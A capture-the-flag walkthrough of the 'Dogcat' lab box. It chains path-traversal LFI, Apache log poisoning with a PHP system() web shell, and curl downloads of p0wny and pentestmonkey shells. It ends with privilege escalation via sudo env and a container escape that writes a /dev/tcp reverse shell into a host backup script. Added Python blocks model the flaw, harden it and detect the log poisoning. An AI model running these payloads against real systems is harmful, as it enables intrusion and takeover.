Dogcat

Last updated 3 years ago

Description:

I made a website where you can look at pictures of dogs and/or cats!

Enumeration

NMAP

nmap -sC -sS -sV -O 10.10.74.124

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 09:02 EDT
Nmap scan report for 10.10.74.124
Host is up (0.72s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat

we have two ports open:

80 running Apache httpd 2.4.38

22 running OpenSSH 7.6p1

website

by clicking on "A dog"

by clicking on "A cat"

By analyzing the URL, we can try to request other files besides the expected ones, for example:

"Sorry, only dogs or cats are allowed."

this message suggests that the system checks whether the URL contains "cat" or "dog"

to bypass this check, we can use cat/../

that is, we enter the folder "cat", leave it again and end up back where we started, but the URL now passes the check

Does it work?

this tried to read index.php and produced an error, but the bypass worked

LFI

Local File Inclusion

we can read .php files from the server

trying to read files with other extensions we get this error:

"passwd.php"

the system appends the .php extension by default

we can read the file "index.php" without errors by base64-encoding it with the PHP "filter" wrapper:

view=php://filter/convert.base64-encode/resource=cat/../index

decoding this base64 gives us the index.php source code, so we can understand how it works

here we can see that the system only appends the extension when we do not set "ext"

so we can read any file by passing an empty "ext"

for example, reading /etc/passwd:

/?view=cat/../../../../../../../../etc/passwd&ext=
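As an added illustration (not the box's own index.php, whose source the write-up only shows in a screenshot), here is a Python model of the two behaviours just described, a substring check for "cat"/"dog" and an extension appended only when "ext" is absent, next to an allowlist-based resolver that does not have the problem. The vulnerable function is a reconstruction from the observed behaviour, so its details are an assumption.

```python
import posixpath
from typing import Optional

# Reconstruction (an assumption, not the box's real index.php) of what the
# write-up observes: 'view' must contain "cat" or "dog", and ".php" is
# appended only when no 'ext' parameter is supplied at all.
def vulnerable_resolve(view: str, ext: Optional[str]) -> Optional[str]:
    if "cat" not in view and "dog" not in view:
        return None  # "Sorry, only dogs or cats are allowed."
    if ext is None:
        ext = ".php"
    return view + ext  # this string goes straight into include()

# Hardened version: exact allowlist, fixed directory, fixed extension.
# The user never influences the path beyond choosing one allowed name.
ALLOWED_VIEWS = {"cat", "dog"}
VIEW_DIR = "/var/www/html"

def safe_resolve(view: str, ext: Optional[str] = None) -> Optional[str]:
    if view not in ALLOWED_VIEWS:
        return None
    # 'ext' is ignored entirely; the extension is not user-controlled.
    full = posixpath.normpath(posixpath.join(VIEW_DIR, view + ".php"))
    # Belt and braces: the normalised path must still sit inside VIEW_DIR.
    if not full.startswith(VIEW_DIR + "/"):
        return None
    return full
```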

RCE

(Remote Code Execution)

in this case we can escalate from LFI to RCE by reading the log files

to read the Apache2 log files:

/?view=cat/../../../../../../../../var/log/apache2/access.log&ext=

now, if we inject PHP code into the log, it will be executed when the log is included, which gives us RCE

to do this I will use the Burp Suite proxy to intercept the request and inject the code by replacing the User-Agent header

writing a web shell:

<?php echo system($_GET['cmd']); ?>

refreshing and viewing the source code :

it works!

now we can run commands from the URL using &cmd=

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls
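The log-poisoning chain above leaves a recognisable trail in the Apache access log: a PHP tag in the User-Agent, and query strings carrying php://, ../, the log path or cmd=. Here is an added Python detector (not part of the write-up) run over constructed sample lines in Apache's combined log format, including one that mimics the poisoned User-Agent.

```python
import re
from typing import List, Dict

# Apache "combined" log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule: (name, field it applies to, pattern). Order is kept in the output.
RULES = [
    ("php_tag_in_user_agent", "ua", re.compile(r"<\?php|<\?=", re.I)),
    ("php_wrapper_in_query", "path", re.compile(r"php://", re.I)),
    ("path_traversal_in_query", "path", re.compile(r"(\.\./|%2e%2e%2f|\.\.%2f)", re.I)),
    ("log_file_included", "path", re.compile(r"/var/log/", re.I)),
    ("command_parameter", "path", re.compile(r"[?&]cmd=", re.I)),
]

def scan_line(line: str) -> Dict[str, object]:
    """Parse one combined-format line and list the rules it triggers."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "hits": [], "raw": line}
    fields = m.groupdict()
    hits = [name for name, field, rx in RULES if rx.search(fields[field])]
    return {"parsed": True, "hits": hits, "ip": fields["ip"],
            "path": fields["path"], "ua": fields["ua"]}

def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Keep only the lines that trigger at least one rule."""
    return [r for r in (scan_line(l) for l in lines) if r["hits"]]

# Constructed sample lines (not real traffic) mirroring the write-up's steps.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2020:09:10:01 -0400] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Oct/2020:09:11:12 -0400] "GET /?view=php://filter/convert.base64-encode/resource=cat/../index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Oct/2020:09:12:30 -0400] "GET /?view=cat/../../../../../../../../etc/passwd&ext= HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Oct/2020:09:13:45 -0400] "GET / HTTP/1.1" 200 512 "-" "<?php echo system($_GET[\'cmd\']); ?>"',
    '10.0.0.5 - - [27/Oct/2020:09:14:02 -0400] "GET /?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]
```

The poisoned-User-Agent line is the one that matters most for alerting, since it is the write that turns the LFI into code execution, while the later traversal hits show the log being included back.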

First flag

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=cat+flag.php

Web Shell

to see what we can use to get a web shell, we can list the machine's binaries:

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls+/usr/bin

I will use curl to fetch a shell from my machine

on our machine:

downloading the p0wny shell:

wget -O powny.php https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php

sudo python3 -m http.server 80

now I will download the file onto the box and save it in /var/www/html

on the box machine (via the RCE):

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=curl <your_ip>/powny.php -o /var/www/html/powny.php

it works

Second flag

Reverse Shell

we will use php-reverse-shell from pentestmonkey

on our machine:

downloading the reverse shell:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

(use nano or vim to change the IP and port)

sudo python3 -m http.server 80

in the web shell:

curl <your_ip>/php-reverse-shell.php -o /var/www/html/shell.php

and now we just browse to:

/shell.php

Privilege Escalation

cd /tmp/

getting linpeas onto the box

on our machine:

downloading linpeas:

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

sudo python3 -m http.server 80

in the reverse shell:

curl <your_ip>/linpeas.sh -o /tmp/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh > output.txt &

reading the output:

cat output.txt

linpeas flagged this binary (/usr/bin/env) as a 99% chance of being a privilege escalation vector

checking GTFOBins for this binary:

sudo env /bin/sh

third flag

Privilege escalation escalation?

as root, in the root (/) of the filesystem we see:

which shows that Docker is installed on this machine, so we will have to do a "container escape"

so, searching for scripts:

find / -type f -name "*.sh" 2>/dev/null

we find: /opt/backups/backup.sh

this script compresses files and is run from outside the container, so I will replace it with a reverse shell, which will then be called from outside the container too

echo '#!/bin/bash' > /opt/backups/backup.sh

echo 'bash -i >& /dev/tcp/<your_ip>/1234 0>&1' >> /opt/backups/backup.sh

and just wait

a few minutes later:

Fourth flag
